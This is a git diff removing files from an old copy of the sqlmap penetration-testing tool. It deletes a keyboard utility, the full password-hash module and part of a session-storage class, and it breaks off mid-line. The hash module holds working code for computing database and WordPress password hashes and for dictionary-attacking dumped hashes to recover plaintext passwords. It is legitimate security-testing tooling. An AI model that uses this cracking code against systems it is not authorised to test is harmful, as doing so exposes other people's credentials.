- """ - def __init__(self): - import Carbon - Carbon.Evt # see if it has this (in Unix, it doesn't) - - def __call__(self): - import Carbon - if Carbon.Evt.EventAvail(0x0008)[0] == 0: # 0x0008 is the keyDownMask - return '' - else: - # - # The event contains the following info: - # (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1] - # - # The message (msg) contains the ASCII char which is - # extracted with the 0x000000FF charCodeMask; this - # number is converted to an ASCII character with chr() and - # returned - # - (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1] - return chr(msg & 0x000000FF) - - -getch = _Getch() - diff --git a/lib/utils/hash.py b/lib/utils/hash.py deleted file mode 100644 index 8ee43253..00000000 --- a/lib/utils/hash.py +++ /dev/null @@ -1,985 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - from crypt import crypt -except ImportError: - from thirdparty.fcrypt.fcrypt import crypt - -_multiprocessing = None -try: - import multiprocessing - - # problems on FreeBSD (Reference: http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) - _ = multiprocessing.Queue() -except (ImportError, OSError): - pass -else: - try: - if multiprocessing.cpu_count() > 1: - _multiprocessing = multiprocessing - except NotImplementedError: - pass - -import gc -import os -import re -import tempfile -import time - -from hashlib import md5 -from hashlib import sha1 -from hashlib import sha224 -from hashlib import sha384 -from hashlib import sha512 -from Queue import Queue - -from lib.core.common import Backend -from lib.core.common import checkFile -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import getFileItems -from lib.core.common import getPublicTypeMembers -from lib.core.common import getSafeExString -from lib.core.common 
import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import normalizeUnicode -from lib.core.common import paths -from lib.core.common import readInput -from lib.core.common import singleTimeLogMessage -from lib.core.common import singleTimeWarnMessage -from lib.core.convert import hexdecode -from lib.core.convert import hexencode -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import HASH -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import COMMON_PASSWORD_SUFFIXES -from lib.core.settings import COMMON_USER_COLUMNS -from lib.core.settings import DUMMY_USER_PREFIX -from lib.core.settings import HASH_MOD_ITEM_DISPLAY -from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD -from lib.core.settings import IS_WIN -from lib.core.settings import ITOA64 -from lib.core.settings import NULL -from lib.core.settings import UNICODE_ENCODING -from lib.core.settings import ROTATING_CHARS -from lib.core.wordlist import Wordlist -from thirdparty.colorama.initialise import init as coloramainit -from thirdparty.pydes.pyDes import des -from thirdparty.pydes.pyDes import CBC - -def mysql_passwd(password, uppercase=True): - """ - Reference(s): - http://csl.sublevel3.org/mysql-password-function/ - - >>> mysql_passwd(password='testpass', uppercase=True) - '*00E247AC5F9AF26AE0194B41E1E769DEE1429A29' - """ - - retVal = "*%s" % sha1(sha1(password).digest()).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def mysql_old_passwd(password, uppercase=True): # prior to version '4.1' - """ - Reference(s): - http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c - http://voidnetwork.org/5ynL0rd/darkc0de/python_script/darkMySQLi.html - - >>> mysql_old_passwd(password='testpass', uppercase=True) - '7DCDA0D57290B453' - """ - - a, b, c = 
1345345333, 7, 0x12345671 - - for d in password: - if d == ' ' or d == '\t': - continue - - e = ord(d) - a ^= (((a & 63) + b) * e) + (a << 8) - c += (c << 8) ^ a - b += e - - retVal = "%08lx%08lx" % (a & ((1 << 31) - 1), c & ((1 << 31) - 1)) - - return retVal.upper() if uppercase else retVal.lower() - -def postgres_passwd(password, username, uppercase=False): - """ - Reference(s): - http://pentestmonkey.net/blog/cracking-postgres-hashes/ - - >>> postgres_passwd(password='testpass', username='testuser', uppercase=False) - 'md599e5ea7a6f7c3269995cba3927fd0093' - """ - - - if isinstance(username, unicode): - username = unicode.encode(username, UNICODE_ENCODING) - - if isinstance(password, unicode): - password = unicode.encode(password, UNICODE_ENCODING) - - retVal = "md5%s" % md5(password + username).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def mssql_passwd(password, salt, uppercase=False): - """ - Reference(s): - http://www.leidecker.info/projects/phrasendrescher/mssql.c - https://www.evilfingers.com/tools/GSAuditor.php - - >>> mssql_passwd(password='testpass', salt='4086ceb6', uppercase=False) - '0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a' - """ - - binsalt = hexdecode(salt) - unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) - - retVal = "0100%s%s" % (salt, sha1(unistr + binsalt).hexdigest()) - - return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) - -def mssql_old_passwd(password, salt, uppercase=True): # prior to version '2005' - """ - Reference(s): - www.exploit-db.com/download_pdf/15537/ - http://www.leidecker.info/projects/phrasendrescher/mssql.c - https://www.evilfingers.com/tools/GSAuditor.php - - >>> mssql_old_passwd(password='testpass', salt='4086ceb6', uppercase=True) - '0x01004086CEB60C90646A8AB9889FE3ED8E5C150B5460ECE8425AC7BB7255C0C81D79AA5D0E93D4BB077FB9A51DA0' - """ - - binsalt = hexdecode(salt) - unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 
256 else "%s") % utf8encode(c), password)) - - retVal = "0100%s%s%s" % (salt, sha1(unistr + binsalt).hexdigest(), sha1(unistr.upper() + binsalt).hexdigest()) - - return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) - -def mssql_new_passwd(password, salt, uppercase=False): - """ - Reference(s): - http://hashcat.net/forum/thread-1474.html - - >>> mssql_new_passwd(password='testpass', salt='4086ceb6', uppercase=False) - '0x02004086ceb6eb051cdbc5bdae68ffc66c918d4977e592f6bdfc2b444a7214f71fa31c35902c5b7ae773ed5f4c50676d329120ace32ee6bc81c24f70711eb0fc6400e85ebf25' - """ - - binsalt = hexdecode(salt) - unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) - - retVal = "0200%s%s" % (salt, sha512(unistr + binsalt).hexdigest()) - - return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) - -def oracle_passwd(password, salt, uppercase=True): - """ - Reference(s): - https://www.evilfingers.com/tools/GSAuditor.php - http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ - http://seclists.org/bugtraq/2007/Sep/304 - - >>> oracle_passwd(password='SHAlala', salt='1B7B5F82B7235E9E182C', uppercase=True) - 'S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C' - """ - - binsalt = hexdecode(salt) - - retVal = "s:%s%s" % (sha1(utf8encode(password) + binsalt).hexdigest(), salt) - - return retVal.upper() if uppercase else retVal.lower() - -def oracle_old_passwd(password, username, uppercase=True): # prior to version '11g' - """ - Reference(s): - http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ - - >>> oracle_old_passwd(password='tiger', username='scott', uppercase=True) - 'F894844C34402B67' - """ - - IV, pad = "\0" * 8, "\0" - - if isinstance(username, unicode): - username = unicode.encode(username, UNICODE_ENCODING) - - if isinstance(password, unicode): - password = unicode.encode(password, 
UNICODE_ENCODING) - - unistr = "".join("\0%s" % c for c in (username + password).upper()) - - cipher = des(hexdecode("0123456789ABCDEF"), CBC, IV, pad) - encrypted = cipher.encrypt(unistr) - cipher = des(encrypted[-8:], CBC, IV, pad) - encrypted = cipher.encrypt(unistr) - - retVal = hexencode(encrypted[-8:]) - - return retVal.upper() if uppercase else retVal.lower() - -def md5_generic_passwd(password, uppercase=False): - """ - >>> md5_generic_passwd(password='testpass', uppercase=False) - '179ad45c6ce2cb97cf1029e212046e81' - """ - - retVal = md5(password).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def sha1_generic_passwd(password, uppercase=False): - """ - >>> sha1_generic_passwd(password='testpass', uppercase=False) - '206c80413b9a96c1312cc346b7d2517b84463edd' - """ - - retVal = sha1(password).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def sha224_generic_passwd(password, uppercase=False): - """ - >>> sha224_generic_passwd(password='testpass', uppercase=False) - '648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f' - """ - - retVal = sha224(password).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def sha384_generic_passwd(password, uppercase=False): - """ - >>> sha384_generic_passwd(password='testpass', uppercase=False) - '6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf' - """ - - retVal = sha384(password).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def sha512_generic_passwd(password, uppercase=False): - """ - >>> sha512_generic_passwd(password='testpass', uppercase=False) - '78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44' - """ - - retVal = sha512(password).hexdigest() - - return retVal.upper() if uppercase else retVal.lower() - -def crypt_generic_passwd(password, salt, uppercase=False): - """ - Reference(s): - 
http://docs.python.org/library/crypt.html - http://helpful.knobs-dials.com/index.php/Hashing_notes - http://php.net/manual/en/function.crypt.php - http://carey.geek.nz/code/python-fcrypt/ - - >>> crypt_generic_passwd(password='rasmuslerdorf', salt='rl', uppercase=False) - 'rl.3StKT.4T8M' - """ - - retVal = crypt(password, salt) - - return retVal.upper() if uppercase else retVal - -def wordpress_passwd(password, salt, count, prefix, uppercase=False): - """ - Reference(s): - http://packetstormsecurity.org/files/74448/phpassbrute.py.txt - http://scriptserver.mainframe8.com/wordpress_password_hasher.php - - >>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp', uppercase=False) - '$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0' - """ - - def _encode64(input_, count): - output = '' - i = 0 - - while i < count: - value = ord(input_[i]) - i += 1 - output = output + ITOA64[value & 0x3f] - - if i < count: - value = value | (ord(input_[i]) << 8) - - output = output + ITOA64[(value >> 6) & 0x3f] - - i += 1 - if i >= count: - break - - if i < count: - value = value | (ord(input_[i]) << 16) - - output = output + ITOA64[(value >> 12) & 0x3f] - - i += 1 - if i >= count: - break - - output = output + ITOA64[(value >> 18) & 0x3f] - - return output - - if isinstance(password, unicode): - password = password.encode(UNICODE_ENCODING) - - cipher = md5(salt) - cipher.update(password) - hash_ = cipher.digest() - - for i in xrange(count): - _ = md5(hash_) - _.update(password) - hash_ = _.digest() - - retVal = prefix + _encode64(hash_, 16) - - return retVal.upper() if uppercase else retVal - -__functions__ = { - HASH.MYSQL: mysql_passwd, - HASH.MYSQL_OLD: mysql_old_passwd, - HASH.POSTGRES: postgres_passwd, - HASH.MSSQL: mssql_passwd, - HASH.MSSQL_OLD: mssql_old_passwd, - HASH.MSSQL_NEW: mssql_new_passwd, - HASH.ORACLE: oracle_passwd, - HASH.ORACLE_OLD: oracle_old_passwd, - HASH.MD5_GENERIC: md5_generic_passwd, - HASH.SHA1_GENERIC: sha1_generic_passwd, - 
HASH.SHA224_GENERIC: sha224_generic_passwd, - HASH.SHA384_GENERIC: sha384_generic_passwd, - HASH.SHA512_GENERIC: sha512_generic_passwd, - HASH.CRYPT_GENERIC: crypt_generic_passwd, - HASH.WORDPRESS: wordpress_passwd, - } - -def storeHashesToFile(attack_dict): - if not attack_dict: - return - - if kb.storeHashesChoice is None: - message = "do you want to store hashes to a temporary file " - message += "for eventual further processing with other tools [y/N] " - test = readInput(message, default="N") - kb.storeHashesChoice = test[0] in ("y", "Y") - - if not kb.storeHashesChoice: - return - - handle, filename = tempfile.mkstemp(prefix="sqlmaphashes-", suffix=".txt") - os.close(handle) - - infoMsg = "writing hashes to a temporary file '%s' " % filename - logger.info(infoMsg) - - items = set() - - with open(filename, "w+") as f: - for user, hashes in attack_dict.items(): - for hash_ in hashes: - hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ - if hash_ and hash_ != NULL and hashRecognition(hash_): - item = None - if user and not user.startswith(DUMMY_USER_PREFIX): - item = "%s:%s\n" % (user.encode(UNICODE_ENCODING), hash_.encode(UNICODE_ENCODING)) - else: - item = "%s\n" % hash_.encode(UNICODE_ENCODING) - - if item and item not in items: - f.write(item) - items.add(item) - -def attackCachedUsersPasswords(): - if kb.data.cachedUsersPasswords: - results = dictionaryAttack(kb.data.cachedUsersPasswords) - - lut = {} - for (_, hash_, password) in results: - lut[hash_.lower()] = password - - for user in kb.data.cachedUsersPasswords.keys(): - for i in xrange(len(kb.data.cachedUsersPasswords[user])): - if (kb.data.cachedUsersPasswords[user][i] or "").strip(): - value = kb.data.cachedUsersPasswords[user][i].lower().split()[0] - if value in lut: - kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value]) - -def attackDumpedTable(): - if kb.data.dumpedTable: - table = 
kb.data.dumpedTable - columns = table.keys() - count = table["__infos__"]["count"] - - if not count: - return - - infoMsg = "analyzing table dump for possible password hashes" - logger.info(infoMsg) - - found = False - col_user = '' - col_passwords = set() - attack_dict = {} - - for column in columns: - if column and column.lower() in COMMON_USER_COLUMNS: - col_user = column - break - - for i in xrange(count): - if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD: - break - - for column in columns: - if column == col_user or column == '__infos__': - continue - - if len(table[column]['values']) <= i: - continue - - value = table[column]['values'][i] - - if hashRecognition(value): - found = True - - if col_user and i < len(table[col_user]['values']): - if table[col_user]['values'][i] not in attack_dict: - attack_dict[table[col_user]['values'][i]] = [] - - attack_dict[table[col_user]['values'][i]].append(value) - else: - attack_dict['%s%d' % (DUMMY_USER_PREFIX, i)] = [value] - - col_passwords.add(column) - - if attack_dict: - infoMsg = "recognized possible password hashes in column%s " % ("s" if len(col_passwords) > 1 else "") - infoMsg += "'%s'" % ", ".join(col for col in col_passwords) - logger.info(infoMsg) - - storeHashesToFile(attack_dict) - - message = "do you want to crack them via a dictionary-based attack? 
%s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]") - test = readInput(message, default="N" if conf.multipleTargets else "Y") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - - results = dictionaryAttack(attack_dict) - lut = dict() - - for (_, hash_, password) in results: - if hash_: - lut[hash_.lower()] = password - - infoMsg = "postprocessing table dump" - logger.info(infoMsg) - - for i in xrange(count): - for column in columns: - if not (column == col_user or column == '__infos__' or len(table[column]['values']) <= i): - value = table[column]['values'][i] - - if value and value.lower() in lut: - table[column]['values'][i] += " (%s)" % lut[value.lower()] - table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) - -def hashRecognition(value): - retVal = None - - isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL) - - if isinstance(value, basestring): - for name, regex in getPublicTypeMembers(HASH): - # Hashes for Oracle and old MySQL look the same hence these checks - if isOracle and regex == HASH.MYSQL_OLD: - continue - elif isMySQL and regex == HASH.ORACLE_OLD: - continue - elif regex == HASH.CRYPT_GENERIC: - if any((value.lower() == value, value.upper() == value)): - continue - elif re.match(regex, value): - retVal = regex - break - - return retVal - -def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): - if IS_WIN: - coloramainit() - - count = 0 - rotator = 0 - hashes = set([item[0][1] for item in attack_info]) - - wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) - - try: - for word in wordlist: - if not attack_info: - break - - if not isinstance(word, basestring): - continue - - if suffix: - word = word + suffix - - try: - current = __functions__[hash_regex](password=word, uppercase=False) - - count += 1 - - if current in hashes: - for item in 
attack_info[:]: - ((user, hash_), _) = item - - if hash_ == current: - retVal.put((user, hash_, word)) - - clearConsoleLine() - - infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) - - if user and not user.startswith(DUMMY_USER_PREFIX): - infoMsg += " for user '%s'\n" % user - else: - infoMsg += " for hash '%s'\n" % hash_ - - dataToStdout(infoMsg, True) - - attack_info.remove(item) - - elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: - rotator += 1 - - if rotator >= len(ROTATING_CHARS): - rotator = 0 - - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) - - if not hasattr(conf, "api"): - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) - - except KeyboardInterrupt: - raise - - except (UnicodeEncodeError, UnicodeDecodeError): - pass # ignore possible encoding problems caused by some words in custom dictionaries - - except Exception, e: - warnMsg = "there was a problem while hashing entry: %s (%s). 
" % (repr(word), e) - warnMsg += "Please report by e-mail to 'dev@sqlmap.org'" - logger.critical(warnMsg) - - except KeyboardInterrupt: - pass - - finally: - if hasattr(proc_count, "value"): - with proc_count.get_lock(): - proc_count.value -= 1 - -def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): - if IS_WIN: - coloramainit() - - count = 0 - rotator = 0 - - wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) - - try: - for word in wordlist: - if found.value: - break - - current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) - count += 1 - - if not isinstance(word, basestring): - continue - - if suffix: - word = word + suffix - - try: - if hash_ == current: - if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes - word = word.upper() - - retVal.put((user, hash_, word)) - - clearConsoleLine() - - infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) - - if user and not user.startswith(DUMMY_USER_PREFIX): - infoMsg += " for user '%s'\n" % user - else: - infoMsg += " for hash '%s'\n" % hash_ - - dataToStdout(infoMsg, True) - - found.value = True - - elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: - rotator += 1 - if rotator >= len(ROTATING_CHARS): - rotator = 0 - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) - - if user and not user.startswith(DUMMY_USER_PREFIX): - status += ' (user: %s)' % user - - if not hasattr(conf, "api"): - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) - - except KeyboardInterrupt: - raise - - except (UnicodeEncodeError, UnicodeDecodeError): - pass # ignore possible encoding problems caused by some words in custom dictionaries - - except Exception, e: - warnMsg = "there was a problem while hashing entry: %s (%s). 
" % (repr(word), e) - warnMsg += "Please report by e-mail to 'dev@sqlmap.org'" - logger.critical(warnMsg) - - except KeyboardInterrupt: - pass - - finally: - if hasattr(proc_count, "value"): - with proc_count.get_lock(): - proc_count.value -= 1 - -def dictionaryAttack(attack_dict): - suffix_list = [""] - custom_wordlist = [""] - hash_regexes = [] - results = [] - resumes = [] - user_hash = [] - processException = False - foundHash = False - - for (_, hashes) in attack_dict.items(): - for hash_ in hashes: - if not hash_: - continue - - hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ - regex = hashRecognition(hash_) - - if regex and regex not in hash_regexes: - hash_regexes.append(regex) - infoMsg = "using hash method '%s'" % __functions__[regex].func_name - logger.info(infoMsg) - - for hash_regex in hash_regexes: - keys = set() - attack_info = [] - - for (user, hashes) in attack_dict.items(): - for hash_ in hashes: - if not hash_: - continue - - foundHash = True - hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ - - if re.match(hash_regex, hash_): - item = None - - if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS): - hash_ = hash_.lower() - - if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): - item = [(user, hash_), {}] - elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): - item = [(user, hash_), {'username': user}] - elif hash_regex in (HASH.ORACLE,): - item = [(user, hash_), {'salt': hash_[-20:]}] - elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): - item = [(user, hash_), {'salt': hash_[6:14]}] - elif hash_regex in (HASH.CRYPT_GENERIC,): - item = [(user, hash_), {'salt': hash_[0:2]}] - elif hash_regex in (HASH.WORDPRESS,): - if ITOA64.index(hash_[3]) < 32: - item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] - else: - warnMsg = "invalid hash '%s'" % hash_ - logger.warn(warnMsg) - - if item and hash_ not in keys: - resumed 
= hashDBRetrieve(hash_) - if not resumed: - attack_info.append(item) - user_hash.append(item[0]) - else: - infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) - if user and not user.startswith(DUMMY_USER_PREFIX): - infoMsg += " for user '%s'" % user - logger.info(infoMsg) - resumes.append((user, hash_, resumed)) - keys.add(hash_) - - if not attack_info: - continue - - if not kb.wordlists: - while not kb.wordlists: - - # the slowest of all methods hence smaller default dict - if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS): - dictPaths = [paths.SMALL_DICT] - else: - dictPaths = [paths.WORDLIST] - - message = "what dictionary do you want to use?\n" - message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] - message += "[2] custom dictionary file\n" - message += "[3] file with list of dictionary files" - choice = readInput(message, default="1") - - try: - if choice == "2": - message = "what's the custom dictionary's location?\n" - dictPaths = [readInput(message)] - - logger.info("using custom dictionary") - elif choice == "3": - message = "what's the list file location?\n" - listPath = readInput(message) - checkFile(listPath) - dictPaths = getFileItems(listPath) - - logger.info("using custom list of dictionaries") - else: - logger.info("using default dictionary") - - dictPaths = filter(None, dictPaths) - - for dictPath in dictPaths: - checkFile(dictPath) - - kb.wordlists = dictPaths - - except Exception, ex: - warnMsg = "there was a problem while loading dictionaries" - warnMsg += " ('%s')" % getSafeExString(ex) - logger.critical(warnMsg) - - message = "do you want to use common password suffixes? (slow!) 
[y/N] " - test = readInput(message, default="N") - - if test[0] in ("y", "Y"): - suffix_list += COMMON_PASSWORD_SUFFIXES - - infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name - logger.info(infoMsg) - - for item in attack_info: - ((user, _), _) = item - if user and not user.startswith(DUMMY_USER_PREFIX): - custom_wordlist.append(normalizeUnicode(user)) - - if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): - for suffix in suffix_list: - if not attack_info or processException: - break - - if suffix: - clearConsoleLine() - infoMsg = "using suffix '%s'" % suffix - logger.info(infoMsg) - - retVal = None - processes = [] - - try: - if _multiprocessing: - if _multiprocessing.cpu_count() > 1: - infoMsg = "starting %d processes " % _multiprocessing.cpu_count() - singleTimeLogMessage(infoMsg) - - gc.disable() - - retVal = _multiprocessing.Queue() - count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) - - for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) - - for p in processes: - p.daemon = True - p.start() - - while count.value > 0: - time.sleep(0.5) - - else: - warnMsg = "multiprocessing hash cracking is currently " - warnMsg += "not supported on this platform" - singleTimeWarnMessage(warnMsg) - - retVal = Queue() - _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) - - except KeyboardInterrupt: - print - processException = True - warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" - logger.warn(warnMsg) - - for process in processes: - try: - process.terminate() - process.join() - except (OSError, AttributeError): - pass - - finally: - if _multiprocessing: - gc.enable() - - if retVal: - conf.hashDB.beginTransaction() - - while not 
retVal.empty(): - user, hash_, word = item = retVal.get(block=False) - attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) - hashDBWrite(hash_, word) - results.append(item) - - conf.hashDB.endTransaction() - - clearConsoleLine() - - else: - for ((user, hash_), kwargs) in attack_info: - if processException: - break - - if any(_[0] == user and _[1] == hash_ for _ in results): - continue - - count = 0 - found = False - - for suffix in suffix_list: - if found or processException: - break - - if suffix: - clearConsoleLine() - infoMsg = "using suffix '%s'" % suffix - logger.info(infoMsg) - - retVal = None - processes = [] - - try: - if _multiprocessing: - if _multiprocessing.cpu_count() > 1: - infoMsg = "starting %d processes " % _multiprocessing.cpu_count() - singleTimeLogMessage(infoMsg) - - gc.disable() - - retVal = _multiprocessing.Queue() - found_ = _multiprocessing.Value('i', False) - count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) - - for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) - - for p in processes: - p.daemon = True - p.start() - - while count.value > 0: - time.sleep(0.5) - - found = found_.value != 0 - - else: - warnMsg = "multiprocessing hash cracking is currently " - warnMsg += "not supported on this platform" - singleTimeWarnMessage(warnMsg) - - class Value(): - pass - - retVal = Queue() - found_ = Value() - found_.value = False - - _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) - - found = found_.value - - except KeyboardInterrupt: - print - processException = True - warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" - logger.warn(warnMsg) - - for process in processes: - try: - process.terminate() - process.join() - except 
(OSError, AttributeError): - pass - - finally: - if _multiprocessing: - gc.enable() - - if retVal: - conf.hashDB.beginTransaction() - - while not retVal.empty(): - user, hash_, word = item = retVal.get(block=False) - hashDBWrite(hash_, word) - results.append(item) - - conf.hashDB.endTransaction() - - clearConsoleLine() - - results.extend(resumes) - - if foundHash and len(hash_regexes) == 0: - warnMsg = "unknown hash format" - logger.warn(warnMsg) - - if len(results) == 0: - warnMsg = "no clear password(s) found" - logger.warn(warnMsg) - - return results diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py deleted file mode 100644 index 44c1987f..00000000 --- a/lib/utils/hashdb.py +++ /dev/null @@ -1,194 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import hashlib -import os -import sqlite3 -import threading -import time - -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import serializeObject -from lib.core.common import singleTimeWarnMessage -from lib.core.common import unserializeObject -from lib.core.data import logger -from lib.core.exception import SqlmapDataException -from lib.core.settings import HASHDB_END_TRANSACTION_RETRIES -from lib.core.settings import HASHDB_FLUSH_RETRIES -from lib.core.settings import HASHDB_FLUSH_THRESHOLD -from lib.core.settings import UNICODE_ENCODING -from lib.core.threads import getCurrentThreadData -from lib.core.threads import getCurrentThreadName - -class HashDB(object): - def __init__(self, filepath): - self.filepath = filepath - self._write_cache = {} - self._cache_lock = threading.Lock() - - def _get_cursor(self): - threadData = getCurrentThreadData() - - if threadData.hashDBCursor is None: - try: - connection = sqlite3.connect(self.filepath, timeout=3, isolation_level=None) - threadData.hashDBCursor = connection.cursor() - 
threadData.hashDBCursor.execute("CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)") - connection.commit() - except Exception, ex: - errMsg = "error occurred while opening a session " - errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) - raise SqlmapDataException(errMsg) - - return threadData.hashDBCursor - - def _set_cursor(self, cursor): - threadData = getCurrentThreadData() - threadData.hashDBCursor = cursor - - cursor = property(_get_cursor, _set_cursor) - - def close(self): - threadData = getCurrentThreadData() - try: - if threadData.hashDBCursor: - threadData.hashDBCursor.close() - threadData.hashDBCursor.connection.close() - threadData.hashDBCursor = None - except: - pass - - @staticmethod - def hashKey(key): - key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key) - retVal = int(hashlib.md5(key).hexdigest()[:12], 16) - return retVal - - def retrieve(self, key, unserialize=False): - retVal = None - - if key and (self._write_cache or os.path.isfile(self.filepath)): - hash_ = HashDB.hashKey(key) - retVal = self._write_cache.get(hash_) - if not retVal: - while True: - try: - for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)): - retVal = row[0] - except sqlite3.OperationalError, ex: - if not any(_ in getSafeExString(ex) for _ in ("locked", "no such table")): - raise - else: - warnMsg = "problem occurred while accessing session file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) - singleTimeWarnMessage(warnMsg) - except sqlite3.DatabaseError, ex: - errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, getSafeExString(ex)) - errMsg += "If the problem persists please rerun with `--flush-session`" - raise SqlmapDataException, errMsg - else: - break - - if unserialize: - try: - retVal = unserializeObject(retVal) - except: - warnMsg = "error occurred while unserializing value for session key '%s'. 
